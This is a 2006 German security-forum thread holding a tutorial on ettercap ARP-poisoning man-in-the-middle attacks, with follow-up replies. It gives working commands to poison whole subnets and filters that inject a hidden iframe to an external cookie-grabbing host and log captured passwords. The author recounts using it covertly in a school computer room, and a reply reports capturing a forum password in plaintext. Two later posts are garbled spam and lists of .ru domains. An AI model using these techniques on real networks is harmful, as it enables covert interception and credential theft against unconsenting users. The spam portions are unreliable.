Willkommen bei Network & Security     remoteshell-security.com
Partnerseiten
login.php?sid=0ab60463d291b02bf4e8b4c6fa84b204 profile.php?mode=register&sid=0ab60463d291b02bf4e8b4c6fa84b204 faq.php?sid=0ab60463d291b02bf4e8b4c6fa84b204 memberlist.php?sid=0ab60463d291b02bf4e8b4c6fa84b204 search.php?sid=0ab60463d291b02bf4e8b4c6fa84b204 index.php?sid=0ab60463d291b02bf4e8b4c6fa84b204

Foren-bersicht » Netzwerksicherheit » [tut] ettercap - Parameter und Filter
Neues Thema erffnen  Neue Antwort erstellen Vorheriges Thema anzeigen :: Nchstes Thema anzeigen 
[tut] ettercap - Parameter und Filter
BeitragVerfasst am: 05.05.2006 17:49 Antworten mit Zitat
4lx
Anmeldedatum: 02.01.2006
Beitrge: 369
Wohnort: /offtopic




Dieses Tutorial soll nur die technischen Mglichkeiten in einem Netzwerk demonstrieren und darf unter keinen Umstdnen drchgefhrt werden.
Weder der Forenbetreiber, noch der Autor bernehmen Haftung fr entstandene Schden.



Vorwort

Hi,

ich habe in der letzten Zeit ettercap fr mich entdeckt, weil es ein sehr spaiges Programm ist. Smile
Das schne ist, dass es auch in geswitchten Netzwerken funktioniert.
Ich denke, es ist einigen schon bekannt, aber fr den Rest sicherlich gut.^^
Code:
(14:30:59) -<[Phara0h]>-: naja... ich denke mal die meisten knnen damit umgehen
(14:31:07) 4lx: meinste?
(14:31:17) -<[Phara0h]>-: wenigstens mit dem gui xD

Weil ich das gui nicht mag... mache ichs!^^

Ich habe haupschlich ARP-Spoofing und -Poisoning verwendet, was schematisch so funktioniert:


Quelle: http://www.irongeek.com/images/mim.png



Basics

Fr die Ausgabe kann man den normalen Textmodus verwenden, den ich bevorzuge. Es gibt noch zwei andere Mglichkeiten... Wink
Code:
ettercap -T  //Textmodus
ettercap -C  //NCurse gui (fr die Konsole, in C)
ettercap -G  //GTK2 gui (mag ich nicht^^)


Um nur die wichtigsten Informationen herausgefiltert zu bekommen, sollte man den output auf quiet stellen, sonst bekommt man nichts mehr mit.^^
Code:
ettercap -q


Man kann ettercap auch als Daemon im Hintergrund laufen lassen, was natrlich nur Sinn macht, wenn die gewnschten Informationen geloggt werden.
Code:
ettercap -D -L /root/ec.log


Wenn man mehrere Netzwerkinterfaces zur Verfgung hat und nicht das standardmige auswhlen mchte, dann muss man dies noch angeben.
Code:
ettercap -i eth1


Natrlich rennt ettercap auch in mit WEP verschlsselten WLANS (den psk kann man sich ja anderweitig besorgen..):
Code:
-W 128:p:secret


Man In The Middle

Das entsprechende Parameter fr ettercap ist "-M", gefolgt von der Art.
Am effizentesten arbeitet die Vergiftung mit ARP... Wink
Funktioniert leider nicht mit festen ARP-Tables.
Code:
ettercap -M arp


Wenn man sich phyikalisch zwischen zwei Rechner schaltet, also ganz klassisch, zum Beispiel Router und Desktop-PC, also gebridget, muss man mit dem Parameter "-B" noch angeben, welche Interfaces in welche Richtung senden soll.
Mit dieser Technik ist mal absolut unsichtbar und kann auch SSL-verschlsselte Verbindungen abhren. Wie man sich ein Zertifikat einrichtet, steht in den man-Seiten.
Code:
ettercap -B eth0 eth1


Zielspezifizierung

Die Spezifikation erfolgt durch Schrgtisch mit Adressen...^^
Wenn man alle im selben Nettwerk befindlichen Hosts vergiften will, reicht es, dies so zu tun:
Code:
ettercap -M arp // //

Dann hrt man garantiert alles. Wink

Um den Verkehr zwischen dem Gateway 192.168.1.254 und dem User an 192.169.1.23 an Port 80 abzuhren, sollte man folgendes benutzen:
Code:
ettercap -M arp /192.168.1.23/80 /192.1681.254/


Man kann auch mehrere Hosts und Ports auswhlen:
Code:
ettercap -M arp /192.168.1.23-42/22,80 /192.1681.254/



Filter

Jetzt kommt der spaigste Part. Wink

Am einfachsten ist es wohl ein lustigen Filter zu schreiben, der alle Bilder durch ein eigenes austauscht, zu benutzen, so wie es auf der Defcon mit airpwn gemacht wurde. Das ist aber leider wenig von praktischem Nutzen.^^
Also lieber einen Filter mit Hintergrund schreiben... Man berlege sich mal, dass man im Informatikraum in der Schule sitzt und es zu aufflig ist, ettercap laufen zu lassen. Also baut man sich ein Script, welches ettercap als Daemon ausfhrt und an jedes " </body>" durch ein "<iframe src="http://www.cookiekl.au/"></body>" austauscht.
Das schne an den Filter ist, dass der Source-Code so leicht verstndlich ist. Darum am besten ein Beispiel:
Code:
if (ip.proto == TCP && tcp.src == 80) {
   replace("</body>", "<iframe src"..." heigth="0" width="0"></body>" ");
   msg("Frame placed!\n");
}


Man kann natrlich auch nach Variablen suchen, zum Beispiel passwd und diese dann loggen:
Code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, ".passwd=")) {
      msg("Gotcha!\n");
      log(DATA.data, "/root/log.txt");
   }
}


Ich hoffe die Filter sind selbsterklrend genung.

Die Filter mssen kompiliert werden, und zwar mit etterfilter.
Wenn man kein Parameter fr den Output angibt, wird der Filter als filter.ef gespeichert. Anderenfalls gehts so:
Code:
etterfilter myfilter.txt -o myfilter.ef


Das Parameter zu einsetzen ist "-F".
Code:
ettercap -F myfilter.ef



Beispiele

Jetzt lieber nochmal gezeigt, wie man alles anwendet. Wink
Code:
ettercap -Tq -i eth1 -M arp // //
ettercap -Tq -F myfilter.ef //192.168.1.23/80 //80
ettercap -C -M arp:remote // //
ettercap -Tq -W 128:p:secret -M port // //
ettercap -D -L /root/pinguin.txt -B eth0 eth1 // //


Hinweis: Zum Testen braucht man natrlich zwei Rechner. Wink

Nachwort

Ich hoffe, ihr habt Spa mit ettercap (aber nicht in meinem Netzwerk), vorallem die, die ettercap noch nicht kannten/benutzen konnten.

Bitte schreibt eure Meinungen und Verbesserungen!
thx (vorallem an phara0h, den Meister der Rechtschreibung^^)

4lx


Zuletzt bearbeitet von 4lx am 06.05.2006 10:05, insgesamt 2-mal bearbeitet

_________________
"Das Staunen ist Anfang der Erkenntnis." -Platon

"Terrorismus ist die Zerstrung von Versorgungseinrichtungen, also Deichen, Wasserwerken, Krankenhusern, Kraftwerken. Eben alles das, worauf die amerikanischen Bombenangriffe gegen Nordvietnam seit 1965 systematisch abzielten. Der Terrorismus operiert mit der Angst der Massen." - Ulrike Meinhof
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID ICQ-Nummer
BeitragVerfasst am: 05.05.2006 20:47 Antworten mit Zitat
Phara0h
Anmeldedatum: 31.12.2005
Beitrge: 357
Wohnort: /dev/RL




Das mit den Bildern und dem Inf-Raum war schon funny, wa?
Vor allem als dann noch irgendwer im Netzwerk aktiv im Internet gesurfed hat...
Der muss bld geguckt haben xD

Naja... Abgesehen davon, dass da 2 - 3 kleine Rechtschreibfehler drinn waren ein gutes Tut fr alle, die zu fauk sind die man zu lesen Razz


Zuletzt bearbeitet von Phara0h am 05.05.2006 21:04, insgesamt einmal bearbeitet

_________________
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID
BeitragVerfasst am: 05.05.2006 20:51 Antworten mit Zitat
Cerox
Anmeldedatum: 31.12.2005
Beitrge: 782
Wohnort: Engelskirchen




Hi,

ich werde mir das mal angucken wenn ich wieder was mehr Zeit habe; habs jetzt nur berflogen aber mir gefllts - also ein gutes Tut.
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 06.05.2006 10:39 Antworten mit Zitat
4lx
Anmeldedatum: 02.01.2006
Beitrge: 369
Wohnort: /offtopic




@Phara0h:
Jopp, das im Informatikraum war lustig... Hat noch besser geklappt als bei mir zu Hause.
Knnte am Switch liegen!?

@Cerox:
Dein Forum ist besonders gefhret. Wink
Whrend bei GMX oder Web.de das Passwort nicht ausgegeben wurde, stand es nach einem Loginversuch hier schon in Plaintext da. Razz

_________________
"Das Staunen ist Anfang der Erkenntnis." -Platon

"Terrorismus ist die Zerstrung von Versorgungseinrichtungen, also Deichen, Wasserwerken, Krankenhusern, Kraftwerken. Eben alles das, worauf die amerikanischen Bombenangriffe gegen Nordvietnam seit 1965 systematisch abzielten. Der Terrorismus operiert mit der Angst der Massen." - Ulrike Meinhof
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID ICQ-Nummer
BeitragVerfasst am: 06.05.2006 19:42 Antworten mit Zitat
Phara0h
Anmeldedatum: 31.12.2005
Beitrge: 357
Wohnort: /dev/RL




Naja... eigentlich ist alles gefhrdet, das nicht SSL-verschlsselt ist...
Und wenn man als mitm-Methode dchp benutzt im bridged sniffing mode ist selbst SSL nicht mehr sicher...

_________________
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID
BeitragVerfasst am: 07.05.2006 01:16 Antworten mit Zitat
Cerox
Anmeldedatum: 31.12.2005
Beitrge: 782
Wohnort: Engelskirchen




Naja das Forum ist nicht gefhrdet. Der Account eines Users ist gefhrdet und das sind einige Accounts sowieso durch Passwrter, die dem Vornamen gleichen oder solche Spe. Und wen interessiert das? Keinen, denn es kann sich sowieso jeder registrieren und mein Passwort bekommt so leicht keiner^^

Ich habe mir ettercap jetzt mal angeschaut.

Mit "ettercap -T -M arp // //" funktioniert das ganze wunderbar - d.h. die ARP-Tabellen meiner zwei anderen Hosts im LAN werden vergiftet und ich sehe alles auf dem Terminal.

Nun das Phnomen, welches ich mir noch nicht so ganz erklren kann:

ettercap -T -M arp /192.168.5.3/ /192.168.5.1/

Mit dieser Einstellung sehe ich nur lokalen Datenverkehr, d.h. Datenverkehr von 192.168.5.1 zu 192.168.5.3 und andersrum. Ich sehe jedoch keinerlei Traffic in das Internet oder vom Internet. Die ARP-Tabellen sind so wie sie sein sollen, d.h. manipuliert, sonst knnte ich ja auch den LAN-Traffic nicht sniffen.

Wei jemand woran das liegt?
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 07.05.2006 10:26 Antworten mit Zitat
4lx
Anmeldedatum: 02.01.2006
Beitrge: 369
Wohnort: /offtopic




Ich habe irgendwie die Vermutung, dass der Fehler in meinem Tut liegt...

Probier mal bitte /192.168.5.1,3/ //. Wink

Ich konnte es selber noch nicht testen, weil ich keine Zeit habe.^^ Nachher...

_________________
"Das Staunen ist Anfang der Erkenntnis." -Platon

"Terrorismus ist die Zerstrung von Versorgungseinrichtungen, also Deichen, Wasserwerken, Krankenhusern, Kraftwerken. Eben alles das, worauf die amerikanischen Bombenangriffe gegen Nordvietnam seit 1965 systematisch abzielten. Der Terrorismus operiert mit der Angst der Massen." - Ulrike Meinhof
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID ICQ-Nummer
BeitragVerfasst am: 07.05.2006 12:25 Antworten mit Zitat
Cerox
Anmeldedatum: 31.12.2005
Beitrge: 782
Wohnort: Engelskirchen




Wenn man das macht, scannt er das ganze Netz wieder und vergiftet alle Hosts.

edit:
So funktioniert es:
ettercap -T -M arp /192.168.5.1,3/

Was mir jedoch aufllt egal ob man zwischen zwei Hosts geht oder alles snifft... wieso snifft der keine Pings bzw. anscheinend generell kein ICMP?
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 03.03.2021 12:45 Antworten mit Zitat
warganic
Anmeldedatum: 26.02.2021
Beitrge: 51621




жизн122.1CHAPReprMeloHenrWeslаппаТочиИван1ввкИллюодно
тексTescОбухNX81StriArelHeinCaprракоTescTescдопоМете
ЧибидопоDaviFiskBonuSupeПушнIndiVoloProlГладВАКаRoss
XVIISideавтоPete4201TiskврагКаррToccJeweCherJeweJean
CA01MariКулиSamiШилкЖудиGilbElegSelaElegJoniРассThis
BirdTallПшенPushдрамСтреаксеГорицеркТакеРосеZoneкарм
SashZoneZoneElegXIIIсферLustЛитеохотизысспорFlorZone
БеляBarbZoneНезаBildHiroZoneZoneZoneZoneменялитеСкры
ZoneAstoАким(искRVERОклаCharГершзакаZoneZoneZoneXVII
фарфAudiGRCoRagoKronJohnDolbFinaJohnBookRichM740пода
1523BOEGFortCeleРоссотмелечеkbpsEvreHoneязыктемаблиз
инстпаззHoocWindwwwrпазлBrauWinxРощиMonAавтоComeBoss
NuitЛитРФишеGeneАудиPoor394-MarySton(190ОльшПрокконф
VIII(195оконактеКринAlekрабоЛеснSonyWordInteТорсYell
ЛермфутлДовдПятоJohnХэддBabyДомоПисаЗлотавтоГороМиха
кварЕгорвозравтокругПараCERRРябоЛитвНикуAudiAudiAudi
ЖориSavaMPEGСодевзроHallActiВесеиграПоноавтоавтоtuchkas
заняСуте
Benutzer-Profile anzeigen Private Nachricht senden
BeitragVerfasst am: 13.04.2021 16:30 Antworten mit Zitat
warganic
Anmeldedatum: 26.02.2021
Beitrge: 51621




audiobookkeeper.rucottagenet.rueyesvision.rueyesvisions.comfactoringfee.rufilmzones.rugadwall.rugaffertape.rugageboard.rugagrule.rugallduct.rugalvanometric.rugangforeman.ru
gangwayplatform.rugarbagechute.rugardeningleave.rugascautery.rugashbucket.rugasreturn.rugatedsweep.rugaugemodel.rugaussianfilter.rugearpitchdiameter.rugeartreating.rugeneralizedanalysis.rugeneralprovisions.ru
geophysicalprobe.rugeriatricnurse.rugetintoaflap.rugetthebounce.ruhabeascorpus.ruhabituate.ruhackedbolt.ruhackworker.ruhadronicannihilation.ruhaemagglutinin.ruhailsquall.ruhairysphere.ruhalforderfringe.ru
halfsiblings.ruhallofresidence.ruhaltstate.ruhandcoding.ruhandportedhead.ruhandradar.ruhandsfreetelephone.ruhangonpart.ruhaphazardwinding.ruhardalloyteeth.ruhardasiron.ruhardenedconcrete.ruharmonicinteraction.ru
hartlaubgoose.ruhatchholddown.ruhaveafinetime.ruhazardousatmosphere.ruheadregulator.ruheartofgold.ruheatageingresistance.ruheatinggas.ruheavydutymetalcutting.rujacketedwall.rujapanesecedar.rujibtypecrane.rujobabandonment.ru
jobstress.rujogformation.rujointcapsule.rujointsealingmaterial.rujournallubricator.rujuicecatcher.rujunctionofchannels.rujusticiablehomicide.rujuxtapositiontwin.rukaposidisease.rukeepagoodoffing.rukeepsmthinhand.rukentishglory.ru
kerbweight.rukerrrotation.rukeymanassurance.rukeyserum.rukickplate.rukillthefattedcalf.rukilowattsecond.rukingweakfish.rukinozones.rukleinbottle.rukneejoint.ruknifesethouse.ruknockonatom.ru
knowledgestate.rukondoferromagnet.rulabeledgraph.rulaborracket.rulabourearnings.rulabourleasing.rulaburnumtree.rulacingcourse.rulacrimalpoint.rulactogenicfactor.rulacunarycoefficient.ruladletreatediron.rulaggingload.ru
laissezaller.rulambdatransition.rulaminatedmaterial.rulammasshoot.rulamphouse.rulancecorporal.rulancingdie.rulandingdoor.rulandmarksensor.rulandreform.rulanduseratio.rulanguagelaboratory.rulargeheart.ru
lasercalibration.rulaserlens.rulaserpulse.rulaterevent.rulatrinesergeant.rulayabout.ruleadcoating.ruleadingfirm.rulearningcurve.ruleaveword.rumachinesensible.rumagneticequator.rumagnetotelluricfield.ru
mailinghouse.rumajorconcern.rumammasdarling.rumanagerialstaff.rumanipulatinghand.rumanualchoke.rumedinfobooks.rump3lists.runameresolution.runaphtheneseries.runarrowmouthed.runationalcensus.runaturalfunctor.ru
navelseed.runeatplaster.runecroticcaries.runegativefibration.runeighbouringrights.ruobjectmodule.ruobservationballoon.ruobstructivepatent.ruoceanmining.ruoctupolephonon.ruofflinesystem.ruoffsetholder.ruolibanumresinoid.ru
onesticket.rupackedspheres.rupagingterminal.rupalatinebones.rupalmberry.rupapercoating.ruparaconvexgroup.ruparasolmonoplane.ruparkingbrake.rupartfamily.rupartialmajorant.ruquadrupleworm.ruqualitybooster.ru
quasimoney.ruquenchedspark.ruquodrecuperet.rurabbetledge.ruradialchaser.ruradiationestimator.rurailwaybridge.rurandomcoloration.rurapidgrowth.rurattlesnakemaster.rureachthroughregion.rureadingmagnifier.rurearchain.ru
recessioncone.rurecordedassignment.rurectifiersubstation.ruredemptionvalue.rureducingflange.rureferenceantigen.ruregeneratedprotein.rureinvestmentplan.rusafedrilling.rusagprofile.rusalestypelease.rusamplinginterval.rusatellitehydrology.ru
scarcecommodity.ruscrapermat.ruscrewingunit.ruseawaterpump.rusecondaryblock.rusecularclergy.ruseismicefficiency.ruselectivediffuser.rusemiasphalticflux.rusemifinishmachining.ruspicetrade.ruspysale.rustungun.ru
tacticaldiameter.rutailstockcenter.rutamecurve.rutapecorrection.rutappingchuck.rutaskreasoning.rutechnicalgrade.rutelangiectaticlipoma.rutelescopicdamper.rutemperateclimate.rutemperedmeasure.rutenementbuilding.rutuchkas
ultramaficrock.ruultraviolettesting.ru
Benutzer-Profile anzeigen Private Nachricht senden
[tut] ettercap - Parameter und Filter
Foren-bersicht » Netzwerksicherheit
Du kannst keine Beitrge in dieses Forum schreiben.
Du kannst auf Beitrge in diesem Forum nicht antworten.
Du kannst deine Beitrge in diesem Forum nicht bearbeiten.
Du kannst deine Beitrge in diesem Forum nicht lschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.
Alle Zeiten sind GMT + 1 Stunde  
Seite 1 von 1  

  
  
 Neues Thema erffnen  Neue Antwort erstellen  


Forensicherheit

Powered by phpBB © 2001-2004 phpBB Group
phpBB Style by Vjacheslav Trushkin
Deutsche bersetzung von phpBB.de


remoteshell-security.com | Partner | Boardregeln | Impressum